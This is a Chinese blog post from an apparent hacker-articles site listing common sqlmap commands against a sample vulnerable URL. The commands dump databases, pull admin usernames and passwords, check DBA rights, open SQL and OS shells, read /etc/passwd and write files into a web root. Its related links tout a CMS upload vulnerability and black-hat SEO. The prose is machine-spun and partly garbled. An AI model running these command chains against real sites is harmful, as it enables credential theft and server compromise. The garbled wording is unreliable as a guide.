最常见的Sqlmap用法

hacker5年前黑客文章757

Sqlmap是一个技术专业的SQL引入专用工具,使用 *** 也许多,实际可以用"sqlmap -hh"查询详细的指令帮助文件,我这仅仅给大伙儿共享一些最常见的Sqlmap用法:

 

一、Sqlmap引入篇

 

1、查验引入点

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11

 

2、爆全部数据库查询信息内容

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --dbs

 

爆当今数据库查询信息内容

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --current-db

 

3、列举特定数据库查询全部的表名

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D fujieace --tables

'fujieace' 为特定数据库查询名字

 

4、列举特定表名的全部字段名

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D vhost48330 -T admin --columns

'admin' 为特定表名字

 

5、dump输出打印表名特定列姓名段的值数据信息

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D vhost48330 -T admin -C name,password --dump

'name,password' 为特定字段称

 

二、Sqlmap用户权限篇

 

1、列举数据库查询智能管理系统客户:

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --users

 

查询当今数据库连接客户:

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --current-user

 

2、分辨当今客户是不是DBA?

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --is-dba

 

3、查询用户权限:

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --privileges
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --privileges -U fujieace

 

三、Sqlmap文件实际操作与shell提权篇

 

1、sql shell

这儿根据sqlmap能够立即获得一个sql shell,立即实行sql语句开展互动。

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --sql-shell
sql-shell> select version();

 

留意:这儿因为进入了sql shell能够实行sql语句了,还可以用 load data infile、load_file、into outfile等涵数来开展文档载入或载入;

 

2、cmd shell

这 里根据sqlmap能够立即获得一个cmd shell,立即实行cmd指令开展互动。

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --os-shell
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --os-cmd=ipconfig

 

3、载入 *** 服务器上特定文档

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-read=/etc/passwd
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-read=d:/test.txt

 

4、载入本地文件到 *** 服务器上

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-write /test/test.txt --file-dest /var/www/html/1.txt
标签: 黑客技术

相关文章

《网络黑白》PDF一键下载

《网络黑白》PDF一键下载

《网络黑白》该书是“花无际”著作。文件目录以下: 第一章 您好 网络黑客 我的安全性之途 网络黑客发展史 对安全性的思索 怎样学习网络黑客 百度搜索引擎英语的语法 网络黑客武器尖刀 普遍进攻方式 被...

Etherape是完全免费的吗?

Etherape是完全免费的吗?

什么叫Etherape? Etherape是以太网接口仿真模拟的图型网络监视器。它具备以图型方法显示信息互联网主题活动的IP,TCP和链路层方式。连接和服务器的尺寸随总流量而转变。它还具备颜色编码协...

网络黑客们最常见哪几种漏洞扫描工具?

网络黑客们最常见哪几种漏洞扫描工具?

我已经写过许多网络黑客方法了,假如你认真学,也可以把握一些了。可是有的新手便会问了,我怎样发觉网址有了你常说的系统漏洞,我怎样应用这种方法?这一就需要采用扫描枪了。   扫描枪是一类自动识...

黑帽往事:电影网站作弊提高排名日收入过万

黑帽往事:电影网站作弊提高排名日收入过万

一家黑帽电影网站,通过垃圾站+挂黑链方式,进行黑帽seo,从而提高百度排名,可实现日收入过万。这家黑帽作弊网站,实际是一家名为“碟民网”的电影网站,通过站长工具查询该网站的百度权重,可发现此网站的...

GDB或GNUProject程序调试

GDB或GNUProject程序调试

什么叫GDB? GDB或GNU Project程序调试是一种网络信息安全数据加密/黑客工具,容许客户在运作时在网络技术应用程序流程或程序流程(手机软件)中开展财务审计和发觉。GDB针对开发者或程序猿...

dedecms 版本漏洞

dedecms 版本漏洞

织网5.7的漏洞,可任意上传~ 搜索关键词:Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc 访问/data/admin/ver.txt来查...